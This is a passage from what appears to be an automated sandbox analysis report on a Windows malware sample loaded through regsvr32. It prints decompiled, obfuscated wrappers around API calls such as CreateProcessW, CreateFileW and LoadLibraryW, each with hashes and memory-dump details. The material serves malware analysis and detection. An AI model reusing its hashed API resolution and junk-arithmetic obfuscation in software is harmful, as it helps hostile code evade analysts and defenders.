				_v8 = _v8 ^ 0x7ff151f0;
				E008D7F78(__ecx, 0xbd3f148a, __ecx, 0x32, __ecx, 0xc1451b2a);
				_t39 = LoadLibraryW(_t43); // executed
				return _t39;
			}












                                                                                                                0x008d4aa4
                                                                                                                0x008d4aa7
                                                                                                                0x008d4aa9
                                                                                                                0x008d4aac
                                                                                                                0x008d4aad
                                                                                                                0x008d4aae
                                                                                                                0x008d4ab3
                                                                                                                0x008d4aba
                                                                                                                0x008d4ac3
                                                                                                                0x008d4aca
                                                                                                                0x008d4ad1
                                                                                                                0x008d4ad8
                                                                                                                0x008d4adf
                                                                                                                0x008d4ae6
                                                                                                                0x008d4aed
                                                                                                                0x008d4af4
                                                                                                                0x008d4afb
                                                                                                                0x008d4b02
                                                                                                                0x008d4b16
                                                                                                                0x008d4b19
                                                                                                                0x008d4b20
                                                                                                                0x008d4b30
                                                                                                                0x008d4b39
                                                                                                                0x008d4b3f

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: fW6%
                                                                                                                • API String ID: 1029625771-2497841860
                                                                                                                • Opcode ID: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction ID: 2cb165dabe0bac3ec209a1a49a37d8ea3c5a45d23a820fad722e7dd23e4b0e81
                                                                                                                • Opcode Fuzzy Hash: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction Fuzzy Hash: 26113671C11208FBCB08DBA99A469DEBBB4FB00311F208189E415B6251D3704B148F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 008E7B25 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E008E7B25() {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _t31;

				_v16 = 0x340970;
				_t2 =  &_v16; // 0x340970
				_t31 = 0x26;
				_v16 =  *_t2 / _t31;
				_v16 = _v16 ^ 0x000e30ec;
				_v8 = 0x85299d;
				_v8 = _v8 + 0xa54a;
				_v8 = _v8 ^ 0x35a74c3e;
				_v8 = _v8 ^ 0x3521895a;
				_v12 = 0xcc7db5;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x000f948d;
				E008D7F78(_t31, 0xbd3f148a, _t31, 0x108, _t31, 0xac0441b9);
				ExitProcess(0);
			}







                                                                                                                0x008e7b2b
                                                                                                                0x008e7b34
                                                                                                                0x008e7b39
                                                                                                                0x008e7b41
                                                                                                                0x008e7b49
                                                                                                                0x008e7b50
                                                                                                                0x008e7b57
                                                                                                                0x008e7b5e
                                                                                                                0x008e7b65
                                                                                                                0x008e7b6c
                                                                                                                0x008e7b73
                                                                                                                0x008e7b77
                                                                                                                0x008e7b8e
                                                                                                                0x008e7b98

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 008E7B98
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID: p4
                                                                                                                • API String ID: 621844428-1539767998
                                                                                                                • Opcode ID: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction ID: ec755df6b352d8e0a3c93fb4cf847f17fa981eea7a1a0a92506135fa11bdc088
                                                                                                                • Opcode Fuzzy Hash: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction Fuzzy Hash: 4BF08C71E0030CFBDB44DBE5D94AA9EBBF0EB50304F20C088D915A7241E7B56B088F41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 008EA50A Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E008EA50A(void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a24, long _a28, intOrPtr _a36, long _a40, intOrPtr _a44, WCHAR* _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t54;
				void* _t65;
				signed int _t66;
				signed int _t67;

				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E008DC98A(_t54);
				_v28 = 0xdc14f8;
				_v24 = 0xd964fd;
				_v20 = 0;
				_v16 = 0xcfd091;
				_v16 = _v16 << 0x10;
				_v16 = _v16 << 8;
				_v16 = _v16 ^ 0x910ec0c9;
				_v12 = 0x7a2ff2;
				_t66 = 0x43;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xd721c1d7;
				_v12 = _v12 ^ 0xd727192a;
				_v8 = 0x1eb7c0;
				_v8 = _v8 ^ 0x33199484;
				_t67 = 0x2d;
				_v8 = _v8 * 0xa;
				_v8 = _v8 / _t67;
				_v8 = _v8 ^ 0x05a21ecf;
				E008D7F78(_t67, 0xbd3f148a, _t67, 0x203, _t67, 0x939ae237);
				_t65 = CreateFileW(_a48, _a28, _a40, 0, _a4, _a16, 0); // executed
				return _t65;
			}













                                                                                                                0x008ea511
                                                                                                                0x008ea516
                                                                                                                0x008ea519
                                                                                                                0x008ea51c
                                                                                                                0x008ea51f
                                                                                                                0x008ea520
                                                                                                                0x008ea523
                                                                                                                0x008ea526
                                                                                                                0x008ea529
                                                                                                                0x008ea52c
                                                                                                                0x008ea52f
                                                                                                                0x008ea532
                                                                                                                0x008ea536
                                                                                                                0x008ea537
                                                                                                                0x008ea53c
                                                                                                                0x008ea546
                                                                                                                0x008ea54f
                                                                                                                0x008ea552
                                                                                                                0x008ea559
                                                                                                                0x008ea55d
                                                                                                                0x008ea561
                                                                                                                0x008ea568
                                                                                                                0x008ea574
                                                                                                                0x008ea579
                                                                                                                0x008ea57e
                                                                                                                0x008ea585
                                                                                                                0x008ea58c
                                                                                                                0x008ea593
                                                                                                                0x008ea59e
                                                                                                                0x008ea5aa
                                                                                                                0x008ea5b3
                                                                                                                0x008ea5bb
                                                                                                                0x008ea5cb
                                                                                                                0x008ea5e4
                                                                                                                0x008ea5ea

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,D727192A,00D964FD,00000000), ref: 008EA5E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction ID: a5e9bdd8e430e0c56135eaeba7ff0ba0af1c875c3c053e1cf78a88fbea8b1997
                                                                                                                • Opcode Fuzzy Hash: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction Fuzzy Hash: E621E272901108FBDF05CFA9C94A8DEBFB6EF48314F108149FA1866220D3728A609F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 008D816B Relevance: 1.6, APIs: 1, Instructions: 68processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 39%
                                                                                                                			E008D816B(struct _STARTUPINFOW* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, WCHAR* _a40, intOrPtr _a48, intOrPtr _a52, struct _PROCESS_INFORMATION* _a56, WCHAR* _a60, int _a64) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t45;
				int _t52;
				struct _STARTUPINFOW* _t56;

				_push(_a64);
				_t56 = __ecx;
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E008DC98A(_t45);
				_v12 = 0x5160ce;
				_v12 = _v12 ^ 0x33bed16b;
				_v12 = _v12 + 0xffffe3b5;
				_v12 = _v12 | 0x3554987c;
				_v12 = _v12 ^ 0x37f1882e;
				_v8 = 0x57d154;
				_v8 = _v8 + 0xffff861a;
				_v8 = _v8 * 0x3e;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x0012f1da;
				_v16 = 0x81ccd1;
				_v16 = _v16 >> 4;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x000c22df;
				E008D7F78(__ecx, 0xbd3f148a, __ecx, 0x245, __ecx, 0x989b5ecc);
				_t52 = CreateProcessW(_a40, _a60, 0, 0, _a64, 0, 0, 0, _t56, _a56); // executed
				return _t52;
			}









                                                                                                                0x008d8173
                                                                                                                0x008d8178
                                                                                                                0x008d817a
                                                                                                                0x008d817d
                                                                                                                0x008d8180
                                                                                                                0x008d8183
                                                                                                                0x008d8186
                                                                                                                0x008d8187
                                                                                                                0x008d818a
                                                                                                                0x008d818b
                                                                                                                0x008d818e
                                                                                                                0x008d818f
                                                                                                                0x008d8192
                                                                                                                0x008d8195
                                                                                                                0x008d8196
                                                                                                                0x008d8199
                                                                                                                0x008d819c
                                                                                                                0x008d819f
                                                                                                                0x008d81a0
                                                                                                                0x008d81a1
                                                                                                                0x008d81a6
                                                                                                                0x008d81b0
                                                                                                                0x008d81bc
                                                                                                                0x008d81c3
                                                                                                                0x008d81ca
                                                                                                                0x008d81d1
                                                                                                                0x008d81d8
                                                                                                                0x008d81ef
                                                                                                                0x008d81f2
                                                                                                                0x008d81f6
                                                                                                                0x008d81fd
                                                                                                                0x008d8204
                                                                                                                0x008d8208
                                                                                                                0x008d820c
                                                                                                                0x008d821c
                                                                                                                0x008d8236
                                                                                                                0x008d823d

                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,00000044,?), ref: 008D8236
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction ID: 5c697b0e105aa3d4cc3b673420f84c441787702ca17787e035b0a608f26c8f5a
                                                                                                                • Opcode Fuzzy Hash: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction Fuzzy Hash: 6B21C372801248BBCF159F95CD09CCEBFB9EF89714F108198FA1562121D3729A65EB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 008D3466 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E008D3466(void* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t29;
				intOrPtr* _t35;
				void* _t36;
				void* _t41;

				_t41 = __ecx;
				E008DC98A(_t29);
				_v8 = 0x88f6ec;
				_v8 = _v8 | 0x6177bf25;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 + 0x167f;
				_v8 = _v8 ^ 0x0004f919;
				_v16 = 0x9ca171;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x0005b7ae;
				_v12 = 0xf5b080;
				_v12 = _v12 * 0x58;
				_v12 = _v12 ^ 0x54793a02;
				_t35 = E008D7F78(__ecx, 0xffc5979d, __ecx, 0xcc, __ecx, 0x31e1b46b);
				_t36 =  *_t35(0, _t41, 0, 0, _a12, __ecx, __edx, 0, 0, _a12, _a16, 0, _a24, _a28, _a32); // executed
				return _t36;
			}










                                                                                                                0x008d3473
                                                                                                                0x008d3486
                                                                                                                0x008d348b
                                                                                                                0x008d3495
                                                                                                                0x008d34a1
                                                                                                                0x008d34a5
                                                                                                                0x008d34ac
                                                                                                                0x008d34b3
                                                                                                                0x008d34ba
                                                                                                                0x008d34be
                                                                                                                0x008d34c5
                                                                                                                0x008d34dc
                                                                                                                0x008d34df
                                                                                                                0x008d34ef
                                                                                                                0x008d34fe
                                                                                                                0x008d3505

                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 008D34FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction ID: daf254395e1aa7eb591bb96168844e27c46b24ae89e3288d5498d2ce689d3bb4
                                                                                                                • Opcode Fuzzy Hash: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction Fuzzy Hash: 8F113671801248BBCB11DFA6DD0AC9FBFB8EB85704F108199F914A2210D3714B24DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 008EEAB3 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E008EEAB3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t35;
				intOrPtr* _t40;
				void* _t41;

				E008DC98A(_t35);
				_v28 = 0xe6c580;
				_v24 = 0;
				_v20 = 0;
				_v8 = 0x2d161b;
				_v8 = _v8 + 0xffffdf88;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 | 0xc1e5ff2b;
				_v8 = _v8 ^ 0xc1e88dee;
				_v16 = 0xd78d92;
				_v16 = _v16 ^ 0xcf4c3c1d;
				_v16 = _v16 ^ 0xcf92c072;
				_v12 = 0x4f9c9d;
				_v12 = _v12 >> 4;
				_v12 = _v12 + 0xffff6ea2;
				_v12 = _v12 ^ 0x00061ead;
				_t40 = E008D7F78(__ecx, 0xbd3f148a, __ecx, 0x47, __ecx, 0x6e03cec5);
				_t41 =  *_t40(_a16, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
				return _t41;
			}












                                                                                                                0x008eeacf
                                                                                                                0x008eead4
                                                                                                                0x008eeade
                                                                                                                0x008eeae6
                                                                                                                0x008eeae9
                                                                                                                0x008eeaf0
                                                                                                                0x008eeaf7
                                                                                                                0x008eeafb
                                                                                                                0x008eeb02
                                                                                                                0x008eeb09
                                                                                                                0x008eeb10
                                                                                                                0x008eeb17
                                                                                                                0x008eeb1e
                                                                                                                0x008eeb25
                                                                                                                0x008eeb29
                                                                                                                0x008eeb30
                                                                                                                0x008eeb49
                                                                                                                0x008eeb5a
                                                                                                                0x008eeb60

                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(000B5C15,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,?,00000023), ref: 008EEB5A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction ID: 66ae757ff0a35d9cc63436037d70b63963485e9daf7ac4bfa1017c933fe1a60f
                                                                                                                • Opcode Fuzzy Hash: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction Fuzzy Hash: 36110476C01219BBCF10DFA4990A9EEBF74FB44314F108189E914A6254D3B14A649FA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 008E7DA0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E008E7DA0(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t34;
				int _t44;
				signed int _t46;
				signed int _t47;
				struct _SHFILEOPSTRUCTW* _t54;

				_push(_a4);
				_t54 = __edx;
				_push(__edx);
				E008DC98A(_t34);
				_v12 = 0xcdb49a;
				_v12 = _v12 + 0x8f05;
				_v12 = _v12 + 0xffff9965;
				_v12 = _v12 ^ 0x00c100f7;
				_v16 = 0xfe6a9a;
				_v16 = _v16 + 0xffff1466;
				_v16 = _v16 ^ 0x00fd95e9;
				_v8 = 0xca762f;
				_v8 = _v8 << 0xe;
				_t46 = 0x7f;
				_v8 = _v8 / _t46;
				_t47 = 0x2e;
				_v8 = _v8 / _t47;
				_v8 = _v8 ^ 0x00082e4e;
				E008D7F78(_t47, 0xffc5979d, _t47, 0xab, _t47, 0x3ddf729);
				_t44 = SHFileOperationW(_t54); // executed
				return _t44;
			}











                                                                                                                0x008e7da7
                                                                                                                0x008e7daa
                                                                                                                0x008e7dac
                                                                                                                0x008e7dae
                                                                                                                0x008e7db3
                                                                                                                0x008e7dbd
                                                                                                                0x008e7dc6
                                                                                                                0x008e7dcd
                                                                                                                0x008e7dd4
                                                                                                                0x008e7ddb
                                                                                                                0x008e7de2
                                                                                                                0x008e7de9
                                                                                                                0x008e7df0
                                                                                                                0x008e7df9
                                                                                                                0x008e7dfe
                                                                                                                0x008e7e06
                                                                                                                0x008e7e0e
                                                                                                                0x008e7e16
                                                                                                                0x008e7e2d
                                                                                                                0x008e7e36
                                                                                                                0x008e7e3c

                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 008E7E36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3080627654-0
                                                                                                                • Opcode ID: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction ID: c6fbb2b4de2448d49cd1d4e3c45567f987815674e1d73f2d2174b31688ec8b54
                                                                                                                • Opcode Fuzzy Hash: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction Fuzzy Hash: 7B118BB1D00208FFDB14DFA9D80A8DEBBB5EB45314F20C19AE418A7241E7B55F149F41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 008D3506 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E008D3506(void* __ecx, void* __edx, void* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t39;
				void* _t47;
				signed int _t49;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E008DC98A(_t39);
				_v16 = 0xf4e2fc;
				_t49 = 0x3b;
				_v16 = _v16 / _t49;
				_v16 = _v16 ^ 0x00083f87;
				_v12 = 0x549d10;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0xffff8515;
				_v12 = _v12 | 0x9f85c2ad;
				_v12 = _v12 ^ 0x9fa0e66d;
				_v8 = 0xbeaf63;
				_v8 = _v8 | 0x7acbe5f7;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x3b62dfe8;
				_v8 = _v8 ^ 0xcc9b72fd;
				E008D7F78(_t49, 0xbd3f148a, _t49, 0x106, _t49, 0xba07f621);
				_t47 = RtlAllocateHeap(_a4, _a16, _a8); // executed
				return _t47;
			}









                                                                                                                0x008d350c
                                                                                                                0x008d350f
                                                                                                                0x008d3512
                                                                                                                0x008d3515
                                                                                                                0x008d3518
                                                                                                                0x008d351d
                                                                                                                0x008d3522
                                                                                                                0x008d3533
                                                                                                                0x008d353b
                                                                                                                0x008d3543
                                                                                                                0x008d354a
                                                                                                                0x008d3551
                                                                                                                0x008d3555
                                                                                                                0x008d355c
                                                                                                                0x008d3563
                                                                                                                0x008d356a
                                                                                                                0x008d3571
                                                                                                                0x008d3578
                                                                                                                0x008d357c
                                                                                                                0x008d3583
                                                                                                                0x008d359a
                                                                                                                0x008d35ab
                                                                                                                0x008d35b0

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(9FA0E66D,?,00083F87), ref: 008D35AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction ID: a8f128a0ed1277b9e9ba17b7cb60e6a4012642d1383916139ae36922e87a8192
                                                                                                                • Opcode Fuzzy Hash: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction Fuzzy Hash: 8C1125B1D00208BFCF04EFA4D84689EBFB5FB44700F208188F914AA221D3728B24EF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 008E02D8 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E008E02D8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t45;
				int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				void* _t75;

				_push(_a8);
				_t75 = __ecx;
				_push(_a4);
				_push(__ecx);
				E008DC98A(_t45);
				_v12 = 0xd4268f;
				_t61 = 0x55;
				_v12 = _v12 / _t61;
				_t62 = 0x39;
				_v12 = _v12 / _t62;
				_t63 = 0x19;
				_v12 = _v12 / _t63;
				_v12 = _v12 ^ 0x00038c24;
				_v16 = 0xae7fc4;
				_v16 = _v16 + 0x7c1;
				_v16 = _v16 ^ 0x00ac1f44;
				_v8 = 0x83f9bc;
				_v8 = _v8 ^ 0x1ab9b921;
				_v8 = _v8 | 0xa5451e1d;
				_t64 = 0x5c;
				_v8 = _v8 / _t64;
				_v8 = _v8 ^ 0x021ff71d;
				E008D7F78(_t64, 0xbd3f148a, _t64, 0x72, _t64, 0x529e328);
				_t59 = CloseHandle(_t75); // executed
				return _t59;
			}













                                                                                                                0x008e02df
                                                                                                                0x008e02e2
                                                                                                                0x008e02e4
                                                                                                                0x008e02e8
                                                                                                                0x008e02e9
                                                                                                                0x008e02ee
                                                                                                                0x008e02ff
                                                                                                                0x008e0304
                                                                                                                0x008e030c
                                                                                                                0x008e0311
                                                                                                                0x008e0319
                                                                                                                0x008e031e
                                                                                                                0x008e0323
                                                                                                                0x008e032a
                                                                                                                0x008e0331
                                                                                                                0x008e0338
                                                                                                                0x008e033f
                                                                                                                0x008e0346
                                                                                                                0x008e034d
                                                                                                                0x008e0357
                                                                                                                0x008e035f
                                                                                                                0x008e0367
                                                                                                                0x008e037b
                                                                                                                0x008e0384
                                                                                                                0x008e038a

                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 008E0384
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction ID: 933f288919690a9aa9a1e28883753c12262cfec0420f53500c4f8878acdba44f
                                                                                                                • Opcode Fuzzy Hash: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction Fuzzy Hash: D4113A71E01208FFEB08DFA5D80A9EEBBB5EB84310F50C09AE504AB280E7B15F119F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:17.4%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1037
                                                                                                                Total number of Limit Nodes:15
